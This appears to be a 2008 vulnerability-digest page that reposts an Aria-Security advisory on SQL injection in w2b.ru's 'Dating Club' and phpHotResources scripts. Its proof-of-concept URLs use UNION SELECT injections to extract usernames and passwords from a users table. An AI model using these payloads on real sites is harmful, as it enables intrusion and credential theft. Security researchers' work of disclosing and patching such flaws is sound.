Дополнительная информация

Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

DOINGSOFT-2008-03-10- 001 -  XSS issue in BOXiR2

WiKID wClient-PHP <= 3.0-2 Multiple XSS Vulnerabilities

From:	noreply_(at)_aria-security.com <noreply_(at)_aria-security.com>
Date:	14 апреля 2008 г.
Subject:	w2b.ru multiple products SQL Injection

-------------------------------------------------------
|       Aria-Security Team (Persian Security Network)   |
|       http://Aria-Security.com (For English)          |
|       http://Aria-Security.net (For Farsi)            |
|       Greetz:                                         |
|       AurA, NULL, Kinglet, t3rr0r1st, Moromort        |
|               and to all of our staff                 |
|               Discovered by The-0utl4w                |
-------------------------------------------------------
Original Advisort

Vendor: http://w2b.ru
Affected Script: "Dating Club"

PoC
browse.php?mode=browsebyCat&_gender=0&age_from=15&age_to=-
4214/**/union/**/select/**/1,user_name,password,4,5,6,7,
8/**/from/**/users/*&country=&state=&field=body

Other product have the same problems.
Example
phpHotResources:
cat.php?lang=4&kind=-4214+union+select+1,user_name,password,4,5,6,7,8,
9+from+users/* (this syntax
mite not work but there's sql injection!)

Original link: http://forum.aria-security.com/showthread.php?p=70

Regards,
The-0utl4w